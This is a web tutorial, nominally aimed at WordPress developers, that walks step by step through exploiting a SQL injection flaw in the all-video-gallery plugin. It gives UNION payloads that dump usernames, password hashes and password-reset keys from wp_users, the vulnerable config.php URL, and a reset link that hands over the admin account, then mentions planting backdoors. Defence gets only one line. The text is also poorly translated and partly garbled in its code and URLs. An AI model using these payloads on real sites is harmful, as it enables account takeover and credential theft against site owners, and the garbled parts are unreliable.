How to use SQL injection attacks on WordPress sites

First of all, my purpose is not to teach others how to attack someone else’s website, destroy others’ efforts. This is the WordPress developer’s guide, they are novice code or do not know the vulnerabilities that may exist in the plugins they are using, so you can avoid coding errors.

Step 1 – Understand the vulnerability in the WordPress site

If your site has been hacked, or if you want to make sure that no one can steal this content, you must first check out the plugin and its code. May be somewhere, the encoder is using sql query, but not aware of SQL injection way to crack wordpress website. If this is somewhere, the hacker will use the federated query and can get all the database rows from the wp_users table. Here is a sample query that uses a federated query to get all WordPress users to see all users’ email addresses.

1
1 union Select 1,2,3,4,5,6,group_concat(user_login,,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

Hackers doing what is here to learn about the administrator’s email, for which he is using federated queries.

A few months ago, due to the following code, Plugin all-video-gallery has a Vulnerabilities in config.php.

1
“SELECT * FROM “.$wpdb->prefix.“allvideogallery_profiles WHERE id=”.$_pid

In this query, Plugin developers use the $ _pid variable directly in the query without any type of conversion.

$ _pid = $ _ GET [‘PID’]

So hackers can use the url in the pid attribute parameters to pass this joint query.

1
http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid={union Query here}

If you add the syndication query to the query, it becomes as follows.

1
“SELECT * FROM “.$wpdb->;prefix.allvideogallery_profiles WHERE id=1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

This file output is a xml file

Step 2 – Reset the WordPress password and get the activation key

Now they will try to reset the password using the administrator’s email. To do so, they will go to the login page and click the “Missing Password” link. At this time, a new activation code will be mailed to the administrator’s email, and the hacker will use the following query to get the activation code.

1
1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

Again, they will pass this joint query as a step forward.

This file output is an xml file, as shown below

Step 3 – Use the activation key and reset the password

This is the last step and he will actually reset your password and will have complete control over your wordpress website. In this step, he will use the activation key to reset the password and follow this link http: // {DOMAIN_NAME_HERE} /wp-login.php?action=rp&key= {ACTIVATION_KEY_HERE} & login = {USERNAME_HERE}

So a hacker can access your wordpress website and can take full control of your site. Usually they insert malicious code in your file or modify a plugin file to become a wordpress backdoor and attack your site again.